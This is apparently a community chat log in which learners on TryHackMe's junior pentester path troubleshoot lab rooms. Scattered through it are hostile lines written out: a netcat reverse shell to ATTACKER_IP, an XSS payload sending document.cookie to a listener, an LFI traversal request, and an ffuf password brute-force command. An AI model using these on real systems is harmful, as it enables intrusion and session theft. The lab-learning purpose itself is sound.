@robust sphinx This channel is for that path.
In the upper right hand corner of the task panel, you should see this button to start the machine. Press it, and then wait for the timer to finish loading and press the blue "Show Split View" button to access the machine.
can someone help me or explain what squid proxy is?
Looks like some kind of caching software. You tried Googling it first, I hope?
yes, but I couldn't find anything
So what did you find?
I've been stuck on it for a few days now.
I mean, I just Googled it and got a general idea, so explain to me what you understand so we can figure out what you don't.
Homie, you're gonna need to apply a little more effort than that to succeed in this game.
I tried to understand what it was about or what it was for, but I couldn't find anything about it.
Everything's ok, I will research a little more and come back with anything later.
thanks for the help
Port80-TCP:V=7.92%I=7%D=6/29%Time=62BCFB53%P=x86_64-unknown-linux-gnu%r
I managed to find this
Ok, so like how technically do you need to understand this tool? What'cha trying to do?
I needed to find its version but I can't find it at all.
I basically understood what it is for and what it does
So you're trying to find the version on your box or the latest release? Which question are you working on? That might help with context.
I am trying to find the box's version, I am doing the beginning of the reconnaissance course.
I would re-read the question and text above it:
Reconnaissance
Squid proxy, does it have a default port? As Bercilak said, Google is your friend.
Can NMAP scan single ports?
Can NMAP enumerate versions?
Everything you need is in the text above the questions
Hello guys, I have a problem here in the SSRF room from the Jr. Penetration Tester path.
The site in task two doesn't work at all; no error appears or anything, it just freezes.
I tried to reset progress and remove the browser cookies but still nothing.
Can you interact with the website at all?
I just did it (I also answered you in #site-support).
Yes, I can copy and paste what I want into the URL section on the site.
The (next) button is working, though when I get to the final slide nothing happens; that's the problem.
You need to use the correct url, working out the syntax from the task.
At first, when I entered a wrong URL, I was getting this error (504 Gateway Timeout), but now nothing, and I'm using the correct one, I'm sure.
What's your URL?
Almost.
but why does no error appear any more?
Nothing happens with that link, at all.
Take out the square brackets.
That's all you need to do. π
nothing happens
Thank you for your time, but still nothing happens.
The server requesting bar at the bottom shows nothing too.
Please refresh the room.
And open the site again and go to the end slide.
and paste the command you're using for me please.
Are you still here?
i did that
What is your url?
Yes, it worked, thank you so much. I was so stupid, there was a space at the end.
I forgot about that.
Thanks for your time again.
No problem!
Next time, if you want to supply screenshots you can do this by verifying.
!docs verify
Regarding the same topic, for me the command python3.9 /opt/impacket/examples/smbserver.py -smb2support -username thm-unpriv -password Password321 public share does not work and I cannot find a workaround. Can you help me with this?
can you show the error you're getting?
The same problem seems to be on the Attack Machine from TryHackMe
that's a python2 script
try just using python instead of python3.9
or just remove python altogether and it'll select whatever it wants
I installed python2 and now it is working, thank you. I think they should also update the command in the instructions.
Being able to troubleshoot that sort of thing is kinda an implied task for all these rooms.
When something doesn't work, figuring out why is just as important as making it work.
hey can anyone help me on task 7?
...Of which room?
lmao
facts
Hey guys! I'm finishing up the Windows Privilege Escalation room and am on Task 7, Abusing vulnerable software. I was following along really well until the end, where it says to "Modify the proxy DLL's payload with a reverse shell to get the flag for this machine".
I'm really stuck here. It might be because it's late at night, but I'm just not sure what it means by telling me to modify the proxy DLL's payload. How would I go about doing that with a reverse shell?
I got myself onto that route a bit ago actually. I'm just struggling with what command exactly to put.
Should I be keeping it outputting to the output.txt file, or just scrap that output and put C:\tools\nc64.exe -e cmd.exe ATTACKER_IP PORT??
ah, okay sweet
Been playing around with how to phrase it for the last like 20 mins. Thank you! Will try it now and see
I still can't seem to get it to work
would anyone mind looking at a screenshot of what I've written and verifying it for me?
nevermind. I ran it one more time and it seemed to have worked. Ty all for help!
Hey, you can just do it one by one. Like, move to the root dir, && move to the tools dir, && exec nc64.exe
|| cd / && cd tools && nc64.exe -e cmd . . . .||
Hi,
I am on the NMAP course, task 14, final question - "Deploy the ftp-anon script against the box. Can Nmap login successfully to the FTP server on port 21? "
For whatever reason, I have port 21 closed; the reason is reset ttl 64.
so my answer should be "no" but i get marked as incorrect
has there been an update or am I doing something wrong?
If it's closed, something is wrong.
ok, i'll try another machine later. thanks
Gave +1 Rep to @idle bison
I'm on the LFI course and I'm stuck at the final task of gaining RCE from RFI. From what I found, it looks like I need to use netcat to establish RCE. But I'm still figuring out what IP to use for it to work.
I'm using my own machine
you need to connect to your VPN ip
How can i see it?
Ah i see
Does the VPN work like a LAN? Meaning I can just serve a file from a Python HTTP server and the site will get it?
yes
Ah, so great. Wish I knew this before. I ended up doing it very inefficiently using a 3rd-party site lol
oh, lol
thanks, finally made it past this room
no worries
I didn't understand but I will take a closer look
If there is an error on one of the Q&A's who do we send that to?
Are you sure it is not because of the answer tolerance???
if you are sure of that then you can report it in #room-bugs
Possibly, but the command I entered that was marked correct won't work in real life. Or at least I've never made it work like that lol.
refresh the page and check what the answer field says
if it has changed it was due to answer tolerance
Ahhh, lol, I refreshed and it added the flag for me. Still marked as correct.
Never seen that happen on here thanks
answer tolerances for the win
The Bell-LaPadula model is not anything anyone should be teaching to junior pentesters. It's not even a valid modern security model.
Also, the Biba model is equally out of date. Why are we teaching 50-year-old security models?
Or if anything, at least call them out for what they are under modern terms: mandatory access controls.
Wow after that whole Linux priv esc challenge the capstone challenge was super easy!! And I didn't think I was retaining anything. Finally feel like I'm making progress!
So I'm on the File Inclusion room Task 8, challenge 2. And for some reason I get an error when trying to open a Burp Browser to intercept the request. If I try to do it with Burp installed on my own computer it just doesn't catch the Cookies header so I can't really edit anything. Anyone know what I'm doing wrong?
Best to verify so you can send a screenshot of the intercepted request.
Also, you could just use the dev tools to edit the cookie, so there would be no real need for burp iirc
Will try
Hi, I am stuck at Content Discovery, tasks 2 and 4. The given website is unable to connect.
What's the URL you are trying to connect to?
Are you trying to reach it from the AttackBox or your own machine?
From the AttackBox
Use http instead of https
Woot, finished the path!
Hi, I am unable to understand "Virtual Host" part of "Subdomain Enumeration". It is written that a particular server can host multiple websites and "Host" header in a web request will tell the server which website the client is requesting. What I assume will happen after sending a request with a particular host header for eg - "Host: admin.acmeitsupport.com", Firstly a DNS request will be made which will get the public IP address of admin.acmeitsupport.com, and then the web request is sent to that IP address.
It is also explained that sometimes the server may use a private DNS server through which we can get the IP address of domains that were not hosted in publicly accessible DNS results, e.g. "dev.acmeitsupport.com".
Now we may use DNS brute force to send many requests to a domain, changing the subdomain part in the Host header ("Host: dev.acmeitsupport.com"), after which a DNS request will be made to get the IP address of "dev.acmeitsupport.com". But if it is not publicly available we are not going to get any IP address, so how are we able to determine whether we discovered a new website or not? Thanks
Hello guys I need help on Windows Privilege Escalation task 4 can't figure out how to find the flag. Can somebody please give me a hint
This
Thank you for your answer.
"dev.acmeitsupport.com" and "admin.acmeitsupport.com", if both exist, will have separate IPs, right, except if they are on a virtual host? If they are on a virtual host, they will have the same IP address, but that IP needs to be resolved by a client DNS server, so how did it bypass DNS in this process?
For eg - We have 2 websites - 1. admin.acmeitsupport.com - this exists
2. dev.acmeitsupport.com - this also exists but in a private DNS server
In first case, if we make first request to "admin" subdomain, the request will look like -
GET / HTTP/1.1
Host: admin.acmeitsupport.com
Now the browser will send a DNS request to get the IP of admin.acmeitsupport.com which it will resolve to some IP as it was publicly accessible, after which it will send the request and we will get the response.
In second case, if we make request to "dev" subdomain, the request will look like -
GET / HTTP/1.1
Host: dev.acmeitsupport.com
This time browser will again send a DNS request but it will not be able to resolve this to an IP as there is no record for this domain in the DNS zone and the request will fail.
So we will not be able to tell if that particular website exists or not.
I am really sorry if this is a very silly question and my understanding is not up to the mark, please help me out. I am pretty sure that I am missing something on TCP 3 way handshake where it already created a session with a particular web server and changing "Host" header is reliable after that but what will be that IP address or rather which server will it connect to and how does it know which server to connect without Host header? Thank you
Gave +1 Rep to @steel nymph
Thank you so much.
Now I understood, we are just adding it to hosts file which will be pointing to a web server which we already know, after which we will send request to that same IP address but changing the "Host" header which causes that web server to respond to the client with the website we want.
I think my English comprehension is a little weak. Now, rereading your first answer, I am able to understand it. Thank you again, and I will definitely look up the terms you provided.
Gave +1 Rep to @steel nymph
Wanna shoot me a DM? I just finished that one. If you follow the instructions for the first half of the task, you should be able to sort it out.
I don't recall whether the AlwaysInstallElevated works for the room, but I know altering the schtask does.
Also, you probably don't want to be in the habit of sharing full screenshots, as it's a good way to accidentally leak info from the background windows on your screen.
I don't usually share a full screenshot but thanks for informing me
@proud ocean don't ask the same thing across several channels, it is spam
ok, sorry, I'm new..
I just wanted to make sure I was going to get help.
I am currently on Linux PrivEsc: Task 9 Privilege Escalation: Cron Jobs. I set up the NC listener and adjusted the backup.sh file in the home directory. Crontab hasn't run the file. What am I missing? I sat and waited for 30 min. Nothing.... I ensured that cron is running.
Check the permissions of backup.sh
Wow... Thank you! Hmmm
Gave +1 Rep to @shadow echo
I'm currently on the Metasploit: Exploitation room and I have to use the EternalBlue module to exploit a machine. I set the RHOST option and then use the run command; it doesn't work for some reason. I've tried on the AttackBox and my local machine. It gives the output:
Enter options and show a screenshot of that pls
Here you go
I also tried to change the LHOST to machine IP but that doesn't work either.
Are you aware that you have set LHOST and RHOSTS to the same IP?
What are LHOST and RHOSTS supposed to be?
Yes, I'm aware of that. I tried with the default LHOST option and that does not work. LHOST is for the local IP and RHOSTS is for the remote IP, if I'm not wrong.
Right, so set the LHOST to your eth0 IP (since I assume you are using the attackbox ?)
And RHOSTS to the target machine IP.
Also make sure you have nothing listening on port 4444 right now, in case you do, choose a different LPORT thats free
Yes, I'm using the AttackBox. I've set RHOSTS to the target machine's IP and I've checked that port 4444 is currently free, but it still didn't work. (Also I set the LHOST to the AttackBox's eth0 IP address.)
So you again getting "Handler failed to bind" ? Or a different error?
If so, could you try changing the LPORT to 4455 for example ?
It's same as before at the end it say:
[*] Exploit completed, but no session was created.
Oh sure, I'm going to try that.
Well there is a chance that the target machine is already messed up once you ran the exploit several times.
So the exploit completed but no session was created is not the error that I'm trying to solve right now, it shouldn't say "Handler failed to bind"
So either way, I would restart the target machine, then put the RHOSTS to the new target machine IP and try again
Yeah, I just did that. I've terminated the AttackBox and the target machine. I'll try the exploit again when the machines are ready.
Make sure to set the LHOST right, that's crucial.
Yeah, I will. It worked now xD
Thank you very much for the help
Hey Guys, I have no modules at /opt/metasploit-framework-[version]/modules
Any guide please? Do I have to download modules separately?
Are you accessing this in attacker box or in your own Kali?
I'm using Ubuntu in my laptop
Check
/usr/share/metasploit-framework/modules
Ubuntu then you have to download metasploit
msfconsole is running
Shell is Only the Beginning
i think from Ubuntu repo
Follow this
Ohh-k brother
In this repo modules are available
Thanks for your time. Will let you once done.
But I recommend that it is better to download Kali
Or use parrot OS instead
Because parrot OS is multipurpose
You can use parrot OS for multi tasking
And pentesting and as a home desktop
They come with pre installed. But i want to do all things manually. For the sake of fundamental understanding.
Ok then you can
Once I will be able to do these manually then I will shift to parrot or kali
But not recommended
Because you have to just install the things and setting up
Ok no problem
By the way, you will learn to install and download things as well
This is what i prefer as a beginner.
That's it brother.
Anyhow. Thanks @valid cape
Gave +1 Rep to @valid cape
For your precious time and guidance.
Best of luck
You can DM me anytime you want
I'll answer you whenever I'll be free
That's great. ☺️
Is it just me, or is FoxyProxy not working in Chrome/Brave?
Have you got it set up?
I use it in chrome all the time I use it.
I tried it in Brave for the first Burp Suite box, but it won't download the certificate.
But in Firefox it does, and the UI looks different/better anyway.
But Firefox isn't my main browser :\ @remote iris
Did you set the host and port?
yeah, of course, 127.0.0.1 host and 8080 port
But the Chromium version looks like it's underdeveloped anyway and missing some features.
I don't use the Chromium that Burp boots, I use Chrome.
yeah but chrome and brave are obviously
chromium browsers
so the same foxyproxy
version
Yeah, I don't look at the UI, I just browse.
is that so
Yeah, no point looking at the UI, it doesn't tell me anything useful other than it's connected.
What type of information could be stored in TXT records that will be useful during a pentest?
Cheers! James π
Just... you should know better by now
I accept that but I was after specifics like I found XYZ there which should not have been. Your findings keep me on track.
You should have googled it and read those.
Also, please keep non path related questions elsewhere, like #infosec-general
How do you define 'Non path' questions as my questions relate to Task 4 of Passive Recon section of Jr Pentesting ?
If it's a question about a room in the path, state which room and question.
In this case, it's pretty tangential
Just a note for the Windows Privesc room at the end of the path: a walkthrough has been published.
Hi friends π
Could I please get some help with regards to Intro to Web Hacking -> Walking an application?
specifically the Debugger section
When I use Firefox I can only see bootstrap.min.js, jquery.min.js and site.js under assets.
with Chrome or Edge browsers I see additional ones like bootstrap.min.css and style.css but I can't find flash.min.js no matter which browsers I use
Thank you in advance...
Hey, I am having trouble on the Windows priv escalation. I am on task 7 and when I try to edit the druvansync exploit file it says I don't have permission. What am I missing?
Anybody help me out here?
I'm trying to access the TryHackMe machine but with no luck.
Consider that I'm using OpenVPN and the IP is correct and working.
what room is it? I don't think you're supposed to ssh into the machine there, if you have to ssh in you'll need a ssh private key
room Subdomain Enumeration
and where does it say to ssh in?
I need to enter this command ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H "Host: FUZZ.acmeitsupport.thm" -u http://10.10.200.108
isn't the path local?
answer this plz π
what's path, what's local
Gave +1 Rep to @maiden stratus
and sorry for wasting your time
No problem π
I'll be more careful next time
Hello,
I am stuck on Windows Privilege Escalation - Task 7 Abusing vulnerable software.
I cannot get into the Administrator directory and I cannot 'type' the flag.txt file. Access is Denied…
I created a new user account and added it to the administrator local group (pwnd).
Any help would be appreciated.
SOLVED! I was able to get to it through the GUI. Then I realized my command prompt wasn't running as admin.
where ?
Hello everyone! I need your help, I'm stuck on this level for hours https://tryhackme.com/room/windowsprivesc20# in task 6 of privesc on Windows. Any help will be appreciated.
@solid folio @stray cape
lmfao
Hey all, task 5 of Linux PrivEsc.
I understand exactly what needs to be done; however, I don't understand why it needs to be done this way.
Why can't I just wget the exploit to the server?
Why do I need to transfer it via a Python HTTP server?
Thanks in advance
This is what I was starting to suspect
cheers lassi
I figured it was either some kind of IPS blocking exploit-db or simply no internet access
time for a dumb question.
Is there a command I should have run or something to figure that out? Or should have the fact wget wasn't working been enough for me to figure it out
guess I could try pinging google
ah okayokay cool, cheers mate
just wasn't sure if I was missing something more complicated
I always tend to over complicate these things lmao
Hey guys, having trouble getting output from ffuf. Can someone help me out? In the room Authentication Bypass/Brute Force.
I created a file valid_usernames.txt and it is saved in /Desktop. While in the same directory as the file that was created, I run this command:
ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.119.23/customers/login -fc 200
The following returns
:: Method : POST
:: URL : http://10.10.119.23/customers/login
:: Wordlist : W1: valid_usernames.txt
:: Wordlist : W2: /usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt
:: Header : Content-Type: application/x-www-form-urlencoded
:: Data : username=W1&password=W2
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
:: Filter : Response status: 200
:: Progress: [40/400] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::
:: Progress: [194/400] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::
:: Progress: [353/400] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::
:: Progress: [400/400] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::
:: Progress: [400/400] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::
It's not providing me with the desired output, the username/password?? Thank you!
god this looks so confusing
Hello, I'm having trouble submitting my answers. It says answer in format *********** and I don't know what that means.
sure is a pain
Most likely your valid_usernames.txt is not right
It's supposed to only hold the usernames and not any other data like size, status etc.
It means that the answer has 3 characters
ohh, thank you
Thank you, I made another file with just the usernames captured. It worked!
Gave +1 Rep to @shadow echo
was the Win_PrivEsc part for the JR_Pentest updated or replaced by new Win_PrivEsc room?
it was replaced
the new one seems a lot more thorough
so the old one was completely removed...
i'm stuck in task_7...
done finally...took me like 1hr. kinda tricky
think so yeh. i was in the middle of this module while it changed hahaha
would love to do that old one
think it's only task 6/7 which have been changed
dll hijacking is not there i think
which task did that come under??
thats old old....
ya it is.. took a screenshot from YT videos lol
found a room for DLL hijacking https://tryhackme.com/room/dllhijacking
Hey Mates, I am facing an issue with msfvenom, I'm not able to generate a Windows x64 reverse shell payload. Does anyone have any idea about this error?
Remove the <>
Ohh Thanks @idle bison
Gave +1 Rep to @idle bison
Done
anyone recommend CTF/challenges after completing Windows PrivEsc....
File Inclusion . Task 8 Challenge
Capture Flag2 at /etc/flag2
Why I can't get access to admin page ? I changed cookie Cookie: THM=Guest to THM=admin and still nothing
Gave +1 Rep to @steel nymph
in the SSRF room, why does the directory traversal trick require an x to be used in front of the /../
in the Linux PrivEsc room under the Cron Jobs module I think it's good if we also add pspy as a tool to check for ongoing cron jobs that aren't listed in the system crontab.
please help
With what?
So here I need to:
create a cmd.txt file containing the code <?php print exec('hostname'); ?>
create a web server with python3 -m http.server
and finally host my web server here
I did all that but the flag not appearing why?
wait a min please
i took this url in my browser field and it worked!
wait
wait please
didn't work
I did everything
should i just copy the answer ?
ok last question
You mean this ip right?
ummm
but
when i run it on my windows and open the sites ( tryhackme asks me to )
i open it with my Kali Linux VM and the VPN running on windows and it works
but ok i will download openvpn on vm kali and try
ok i'll try
thanks I'll try tomorrow
Gave +1 Rep to @steel nymph
@steel nymph I set things up
but I don't know how to show my vpn ip address
with no use π
and I can't find the port
waitttttttttttttttttt
it worked
it workkkkkkkkkkkkked
finally :
you know I was working on this for 2 days trying not to be a child and ask
and failed tho π
anyway
Thanks again
Gave +1 Rep to @steel nymph
whats happening peeps
Is anyone's "Acme IT Support" web page not working today? I'm doing the username enumeration room and it's not working. I tried it on another device and I'm getting the same result.
hello everyone. can someone please help me in cracking the capstone challenge
i'm trying to use exploit 42887.c
CVE-2017-1000253
I have compiled it and transferred it to the attacking machine
but when i'm running it, it's not giving me root privileges
Is your VPN working?, if yes then did you add the ip with domain in the host file?
Which room?
Linux privilege escalation
for the capstone challenge you should only need commands and stuff already on the target machine more or less
you will need to do some password cracking but other than that everything you need is on the target already
I already did that... Cracked the pass for missy and read the file via the suid bit..
Is it root suid?
It's solved but i want to do it with metasploit as i'm not satisfied
You're going to need a much more modern exploit than that.
U can do it by file reading suid..
That's not what I asked though
yeah for missy it is base64 suid binary exploitation
but for root you need something else
I did the same for the root flag also.. it worked
I'm kinda weak in exploits so i wanna do it that way
Hello,
As part of the path for jr pentest I'm doing 'https://tryhackme.com/room/metasploitexploitation'
I understand I need to use the EternalBlue vuln to move on, however, for me it says the machine is not vulnerable to EternalBlue. I also ran nmap with --script=vuln and I don't get what I used to get with other machines where I could see the EternalBlue vulnerability. Any suggestions?
Cross-site Scripting , Task 8
While using the TryHackMe AttackBox, let's set up a listening server using Netcat:
user@machine$ nc -nlvp 9001
Now that we've set up the method of receiving the exfiltrated information, let's build the payload.
</textarea><script>fetch('http://{URL_OR_IP}?cookie=' + btoa(document.cookie) );</script>
so what IP should i use now? the site ip? 10.10.78.174 and port 9001? I tried 8000/9001 with a different ip and it did not work
Console showing ~# nc -nlvp 9001
Listening on [0.0.0.0] (family 0, port 9001)
and nothing else
The other links in other rooms are working. Except for the authentication bypass room.
You should use your attack box IP followed by the port number you are listening on via netcat ( looking at the example, it is 9001 in your case )
Nvm. My VPN was disconnected. Thank you!
Gave +1 Rep to @rustic totem
Anyone from netherlands here? Pm me
Could you please not post your question in multiple channels, especially if it has nothing to do with the learning path you are asking it in.
It's considered spam.
π
LFI chall3: question. After going down many rabbit holes (truncation, php wrappers, etc) I understood, also looking at the channel (thanks for this community!). Now the question: why if I use Burp Suite Repeater to tamper with the method and POST the dir traversal URL does it not get output?
<b>Warning</b>: include(.php)
and if I use curl instead I see the warning with the attempt of dir traversal? <b>Warning</b>: include(../../../etc/flag3.php)
in short: curl shows that it attempts to read the flag file while Burp Suite doesn't... I spent so much time with Burp Suite! maybe it's me not using it properly
anyone with an answer?
thanks I got it: POST /challenges///chall3.php?file=welcome HTTP/1.1
Host: 10.10.123.120
User-Agent: curl/7.83.1
Accept: */*
Content-Length: 26
Content-Type: application/x-www-form-urlencoded
Connection: close
file=../../../etc/flag3%00
that little bottom line there makes all the difference
indeed I need some basics here. Thanks again for the prompt support π
ok ty
Gave +1 Rep to @honest steeple
Just completed my junior pentester pathway! Why is it that when interviewing for entry level offensive roles I get asked that I need more experience to qualify? I've spent 10 years in I.T. and 2 years already in DevSecOps with a focus in cyber risk
tryhackme is experience too?
No
but it can classify as a relevant hobby and mark that you are working on bettering yourself by learning
Do i enter the server ip somewhere for this? nc -nlvp 9001
It still did not work
root@ip-10-10-165-215:~# nc -nlvp 9001
Listening on [0.0.0.0] (family 0, port 9001)
Xss works fine and i have entered script etc.. to grab the cookie
<script>fetch('http://{10.10.165.215:9001}?cookie=' + btoa(document.cookie) );</script>
I tried to run server on 8000 it did not work either just showing nothing
Tried server and netcat 8000,9001 still nothing just does not show anything i tried both ip both ports
nvm its working now
You've entered the ip wrong
It's not a valid url
Hello everyone
I'm at the last q in Cross-site Scripting room and the q is:
What is the value of the staff-session cookie?
He asked me to use netcat but I used python -m http.server instead
So I need to create a support ticket on Acme IT Support
here I need to put in the ticket content a payload
</textarea><script>fetch('http://127.0.0.1:8000?cookie=' + btoa(document.cookie) );</script>
soooo when a staff member presses it, his cookies are sent to my server ( Python server )
but when I decoded the cookie by https://www.base64decode.org/ ( and by the way it's c2Vzc2lvbj0wNzBmZTJjZTZmMWNlMGJmZGE1N2E0NzE2ODE3MGVjOA== )
The result is :
session=070fe2ce6f1ce0bfda57a47168170ec8
BUT IT IS NOT WORKING WHY? IS the IP address wrong or what?
and thanks
Is that your cookie?
You mean the result ?
after i created the ticket with the payload
i pressed it
so the cookie sent to me
me right?
ok cause i want the cookie to sent to me right?
yep
so what is the ip
is the machine one?
idk
I think yeah
my localhost
If I use 127.0.0.1 on my laptop, does it refer to your machine?
I believe in you, think about it